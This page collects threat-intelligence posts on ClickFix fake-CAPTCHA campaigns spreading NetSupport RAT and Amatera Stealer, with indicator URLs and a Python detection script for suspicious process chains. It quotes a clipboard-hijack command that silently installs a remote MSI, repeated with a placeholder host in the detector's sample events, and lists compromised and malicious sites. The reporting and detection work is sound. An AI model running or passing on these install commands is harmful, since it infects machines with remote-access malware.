2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.
Details at www.malware-traffic-analysis.net/2025/12/29/index.html
Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.
The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.
New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.
Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/
Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.
The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.
Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.
Thoughts on this growing reliance on execution through supposedly “trusted” system tools?
💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting
#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch
New EVALUSION ClickFix campaign:
Amatera Stealer and NetSupport RAT are being distributed
Cyber security researchers at eSentire have discovered a malware campaign named EVALUSION that uses the now widespread ClickFix social engineering pattern to install the Amatera Stealer and the NetSupport RAT.
More: https://maniabel.work/archiv/265
#ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
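The two posts above describe the execution side of these chains: a clipboard-hijacked `msiexec /i <remote URL> ... /qn` command pasted into the Run dialog, and the EVALUSION chain of mshta.exe spawning PowerShell which in turn launches MSBuild.exe for injection. The following detection logic is an added example written for this page, not code from any of the posters or vendors quoted here. It assumes a normalised process-creation feed (Sysmon Event ID 1 or an EDR equivalent) with `pid`, `ppid`, `image` and `cmd` fields; the sample events and their URLs are constructed and the `example.invalid` hosts are placeholders, not indicators from the campaigns.

```python
"""Rule-based detection over process-creation events for the ClickFix
tradecraft described above: silent msiexec installs from a remote URL,
and the LOLBin chain mshta.exe -> powershell.exe -> MSBuild.exe.
All events below are constructed samples, not real telemetry."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample feed: one dict per process start, already normalised.
# Field names (pid, ppid, image, cmd) are an assumption about the feed format.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "100", "ppid": "1", "image": "explorer.exe", "cmd": "explorer.exe"},
    # Clipboard-hijack command pasted into the Run dialog (URL is a placeholder)
    {"pid": "200", "ppid": "100", "image": "msiexec.exe",
     "cmd": "msiexec /i https://example.invalid/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn"},
    # Legitimate quiet install from a local path: must not alert
    {"pid": "210", "ppid": "100", "image": "msiexec.exe",
     "cmd": r"msiexec /i C:\Users\alice\Downloads\7z.msi /qn"},
    # EVALUSION-style chain: mshta -> powershell -> MSBuild
    {"pid": "300", "ppid": "100", "image": "mshta.exe",
     "cmd": "mshta https://example.invalid/page.hta"},
    {"pid": "301", "ppid": "300", "image": "powershell.exe",
     "cmd": "powershell -w hidden -ep bypass -enc QQBCAEMA"},
    {"pid": "302", "ppid": "301", "image": "MSBuild.exe",
     "cmd": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
    # MSBuild started by Visual Studio is normal developer activity
    {"pid": "400", "ppid": "100", "image": "devenv.exe", "cmd": "devenv.exe"},
    {"pid": "401", "ppid": "400", "image": "MSBuild.exe", "cmd": "MSBuild.exe proj.csproj"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
QUIET_FLAG = re.compile(r"(?i)[/-](qn|quiet)\b")
# Script hosts that should not normally be the parent of MSBuild.exe
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


@dataclass
class Alert:
    rule: str
    pid: str
    detail: str


def build_index(events: List[Dict[str, str]]) -> Dict[str, Dict[str, str]]:
    """Map pid -> event so parent lookups are O(1)."""
    return {e["pid"]: e for e in events}


def parent_chain(event: Dict[str, str], index: Dict[str, Dict[str, str]],
                 depth: int = 3) -> List[str]:
    """Return lower-cased image names of the ancestors of `event`, nearest first."""
    chain: List[str] = []
    cur = index.get(event["ppid"])
    while cur is not None and len(chain) < depth:
        chain.append(cur["image"].lower())
        cur = index.get(cur["ppid"])
    return chain


def detect(events: List[Dict[str, str]]) -> List[Alert]:
    """Apply the three rules to every event and return the alerts in feed order."""
    index = build_index(events)
    alerts: List[Alert] = []
    for e in events:
        image = e["image"].lower()
        cmd = e["cmd"]
        ancestors = parent_chain(e, index)
        # Rule 1: msiexec fetching a package from a remote URL and installing silently
        if image == "msiexec.exe" and REMOTE_URL.search(cmd) and QUIET_FLAG.search(cmd):
            alerts.append(Alert("msiexec_remote_quiet_install", e["pid"], cmd))
        # Rule 2: mshta.exe as the direct parent of PowerShell
        if image == "powershell.exe" and ancestors and ancestors[0] == "mshta.exe":
            alerts.append(Alert("mshta_spawns_powershell", e["pid"], cmd))
        # Rule 3: MSBuild launched by a script host rather than a build tool
        if image == "msbuild.exe" and ancestors and ancestors[0] in SCRIPT_HOSTS:
            alerts.append(Alert("msbuild_from_script_host", e["pid"],
                                " <- ".join([image] + ancestors)))
    return alerts


def alert_rules(events: List[Dict[str, str]]) -> List[str]:
    """Convenience wrapper returning only the rule names that fired."""
    return [a.rule for a in detect(events)]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid} {a.detail}")
```

Run against the sample feed, rule 1 fires on pid 200 but not on the local-path install (pid 210), rule 2 on the PowerShell child of mshta.exe (pid 301), and rule 3 on the MSBuild.exe whose nearest ancestor is PowerShell (pid 302) while the MSBuild.exe under devenv.exe stays quiet. Walking three generations of parents rather than one is what lets rule 3 still fire when an intermediate cmd.exe or conhost.exe sits between PowerShell and MSBuild.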
2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)
Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.
Other sites have injected script that redirects to the URL for the fake CAPTCHA page.
Direct example (compromised site --> script for CAPTCHA page):
- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js
Redirect example (compromised site --> Redirect URL --> script for CAPTCHA page):
- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js
Either way, you get the same CAPTCHA page.
IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt
cc: @monitorsg